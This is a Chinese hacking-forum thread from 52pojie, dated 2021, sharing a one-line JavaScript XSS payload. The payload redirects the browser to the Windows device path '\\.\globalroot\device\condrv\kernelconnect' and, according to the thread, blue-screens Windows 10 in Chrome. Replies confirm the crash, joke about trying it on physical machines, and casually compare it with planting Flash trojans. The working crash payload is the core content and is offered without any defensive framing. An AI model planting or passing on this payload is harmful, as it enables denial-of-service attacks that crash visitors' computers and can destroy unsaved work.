吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

注册[Register]

QQ登录

只需一步,快速开始

[讨论] xss导致蓝屏payload首现

aydcyhr 发表于 2021-1-18 16:54
<script>document.location = '\\\\.\\globalroot\\device\\condrv\\kernelconnect';</script>
<script>document.location = '\\\\.\\globalroot\\device\\condrv\\kernelconnect';</script>

该payload可导致chrome下蓝屏,Firefox没反应

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

wuxin 发表于 2021-1-18 17:03

1.需要 win10
2.这个就是你 在谷歌浏览器打开   \globalroot\\device\\condrv\\kernelconnect   直接也是蓝屏,一个道理,只是利用网页加载了本地的文件,换了一种方式。
3.xss 打别人蓝屏毫无用处,还不如挂个 flash 马来得快。
列明 发表于 2021-1-19 12:16
金陵十三钗 发表于 2021-1-19 12:08
开个虚拟机试试,记得保存快照哈哈哈。
我试了下,是真的会蓝屏

放心,我不會冒險了。
盤裏還有那麽多小姐姐,
我實在放心不下。
我怕藍屏了之後她們都沒了。
nevinhappy 发表于 2021-1-18 16:59
a38758720 发表于 2021-1-18 17:18
似乎就win10会有这个问题,火狐谷歌浏览器测试蓝屏
tick.web 发表于 2021-1-18 18:16
a38758720 发表于 2021-1-18 17:18
似乎就win10会有这个问题,火狐谷歌浏览器测试蓝屏

666,真蓝了
列明 发表于 2021-1-18 19:21
我今年還沒藍屏過,不知怎麽的,心裏蠢蠢欲動,就是想試試。
快要按捺不住了。
老機劉叔 发表于 2021-1-18 20:37
牛逼哈哈哈哈哈
金陵十三钗 发表于 2021-1-19 12:08
列明 发表于 2021-1-18 19:21
我今年還沒藍屏過,不知怎麽的,心裏蠢蠢欲動,就是想試試。
快要按捺不住了。

开个虚拟机试试,记得保存快照哈哈哈。
我试了下,是真的会蓝屏
 楼主| aydcyhr 发表于 2021-1-20 02:11
yzjz1999 发表于 2021-1-19 17:05
虚拟机测可以,Chrome+win10 2004可以

这么有趣肯定要物理机来玩了